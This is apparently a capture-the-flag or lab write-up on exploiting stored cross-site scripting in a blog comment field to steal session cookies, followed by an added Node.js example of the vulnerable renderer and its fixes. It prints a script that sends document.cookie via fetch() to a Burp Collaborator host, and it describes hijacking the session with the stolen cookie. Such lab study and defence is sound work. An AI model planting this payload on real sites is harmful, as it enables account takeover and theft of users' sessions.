mm0@home:~$

[XSS] Lab: Exploiting cross-site scripting to steal cookies

All other fields are filtered, but in the comment field we can inject script.

We were able to inject the following, which pops the cookie in an alert:

<script>
alert(document.cookie);
</script>

But since we need to exfiltrate the cookie rather than just display it, we can store it in a variable and send it to a Burp Collaborator host:

<script>
  // Read the cookies visible to script (possible because the session cookie lacks HttpOnly)
  var ckie = document.cookie;
  // The scheme is required: without it the browser resolves the host as a relative
  // path on the lab's own origin and the request never reaches Collaborator
  let colab = `https://tif8tzv0frnz6llnlkaxlj37hynpbfz4.oastify.com/?${encodeURIComponent(ckie)}`;
  // Send the GET request carrying the URL-encoded cookie string
  fetch(colab);
</script>

Now we can see the request that arrived at Collaborator.

If we URL-decode the query string of that request, we get:

/?secret=urml14vXd4SlfFb8LXi7k8Vy6YUtJVpV; session=gDc7Q2pfaagxWQr0qoGsajDsR9xSBRO2

So to impersonate that user we simply need to change our own cookie to theirs.

I will use the browser for this, but we can also use Burp Suite Repeater.

Using a cookie manager extension, set the session cookie to the stolen value.

Then just refresh the page, and we are logged in as the victim.
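Why the comment field is exploitable, and the two server-side fixes that would have defeated the payload above, as an added example (Node.js; this is not code from the lab or this post, and the function names and sample comment are hypothetical):

```javascript
// Added example (not from the lab or the original post): a minimal comment
// renderer showing the defect the lab exploits and the two fixes that defeat
// this payload. renderCommentUnsafe, renderCommentSafe and sessionCookie are
// hypothetical names.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
const escapeHtml = (s) => String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);

// Vulnerable: the comment body is interpolated into the HTML verbatim, so a
// <script> tag in a comment runs in every reader's browser.
function renderCommentUnsafe(comment) {
  return `<p class="comment">${comment}</p>`;
}

// Fix 1: output-encode untrusted text for the HTML text-node context, so the
// payload is displayed as literal text instead of being parsed as markup.
function renderCommentSafe(comment) {
  return `<p class="comment">${escapeHtml(comment)}</p>`;
}

// Fix 2 (defence in depth): mark the session cookie HttpOnly so document.cookie
// cannot read it even if a script does run; Secure and SameSite are good
// companions but are not what blocks this particular payload.
function sessionCookie(value) {
  return `session=${value}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Helper used to check the rendered output: is there still a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample comment of the same shape as the lab's first payload.
const samplePayload = '<script>alert(document.cookie)</script>';
```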